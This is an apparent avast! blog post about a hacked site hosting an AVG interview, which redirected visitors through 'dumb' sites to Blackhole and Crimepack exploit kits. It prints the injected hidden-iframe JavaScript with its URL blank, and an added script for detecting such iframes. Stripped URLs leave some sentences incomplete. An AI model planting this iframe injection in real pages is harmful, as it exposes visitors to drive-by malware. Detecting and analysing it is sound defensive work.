The Latest in IT Security

Hack found on AVG interview site


AVG Anti-Virus, a company headquartered not too many kilometers down the road from the AVAST main offices in Prague, promoted an interview with their community manager today on Facebook. Hoping to learn a thing or two, we curiously clicked on the link. To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to which triggered the blocking action. The only content on is one word – GOTCHA!

Senior virus analyst Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site where the AVG interview was published,, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitor’s cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers running on dumb site’s database with visiting IP addresses, and if they found this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to, or its variations, was injected to other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:


Sirmer discovered that malicious site is one of the malicious sites where users were redirected from one of the dumb sites. includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and Flash files onto users' computers.

In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites in 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like which has lots of visitors.

An example of injected code:

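    // Injected script as published; the iframe URL is missing from the source.
    if (document.getElementsByTagName('body')[0]) {
        // The body already exists: build the hidden frame through the DOM.
        iframer();
    } else {
        // No body yet: write the same hidden 10x10 frame straight into the page.
        document.write("<iframe src='' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }

    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', '');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }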
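For site owners checking their own pages for this kind of injection, the following is an added example (not code from avast! or from the original article) that scans page source for iframes with the traits of the injected code above: tiny dimensions, hidden visibility and absolute positioning, whether written as markup or built through the DOM. The function names, the 10-pixel threshold, the two-of-three rule and the example.invalid host are assumptions made for illustration.

```javascript
// Added example: flags iframes that share the traits of the injected snippet.
// example.invalid is a constructed placeholder host, not a URL from the article.
const TINY = 10; // width/height at or below this is treated as invisible

function traits(w, h, visHidden, posAbs) {
  const r = [];
  if (w <= TINY && h <= TINY) r.push("tiny-dimensions");
  if (visHidden) r.push("hidden-style");
  if (posAbs) r.push("absolute-position");
  return r;
}

function scoreStaticTag(tag) { // <iframe ...> in markup or a document.write string
  const num = (n) => parseInt((tag.match(new RegExp("\\b" + n + "\\s*=\\s*['\"]?(\\d+)", "i")) || [])[1], 10);
  const style = (tag.match(/style\s*=\s*(['"])(.*?)\1/i) || [])[2] || "";
  return traits(num("width"), num("height"),
    /visibility\s*:\s*hidden|display\s*:\s*none/i.test(style), /position\s*:\s*absolute/i.test(style));
}

function scoreDomCreated(js, v) { // iframe built via createElement and held in variable v
  const num = (n) => parseInt((js.match(new RegExp("\\b" + v + "\\.(?:setAttribute\\(\\s*['\"]" + n + "['\"]\\s*,|" + n + "\\s*=)\\s*['\"]?(\\d+)")) || [])[1], 10);
  const has = (prop, val) => new RegExp("\\b" + v + "\\.style\\." + prop + "\\s*=\\s*['\"]" + val).test(js);
  return traits(num("width"), num("height"), has("visibility", "hidden"), has("position", "absolute"));
}

function findHiddenIframes(source) {
  const found = [];
  for (const m of source.matchAll(/<iframe\b[^>]*>/gi))
    found.push({ kind: "static-tag", reasons: scoreStaticTag(m[0]) });
  for (const m of source.matchAll(/\b([A-Za-z_]\w*)\s*=\s*document\.createElement\(\s*['"]iframe['"]\s*\)/g))
    found.push({ kind: "dom-created", reasons: scoreDomCreated(source, m[1]) });
  return found.filter((f) => f.reasons.length >= 2); // need two of three traits
}

// Constructed sample: one ordinary embed plus both injection paths from the snippet.
const SAMPLE = `
<iframe src="https://example.invalid/video" width="560" height="315"></iframe>
<script>
document.write("<iframe src='http://example.invalid/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
var f = document.createElement('iframe');
f.setAttribute('src', 'http://example.invalid/');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.body.appendChild(f);
</script>`;

console.log(findHiddenIframes(SAMPLE));
```

The scan is pattern-based, so obfuscated or dynamically assembled script will not match; a hit is a reason to review the page source by hand.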

An image of our first visit to

And the second visit. Images provided by avast! Virus Lab.

This image has been marked to show the redirection to
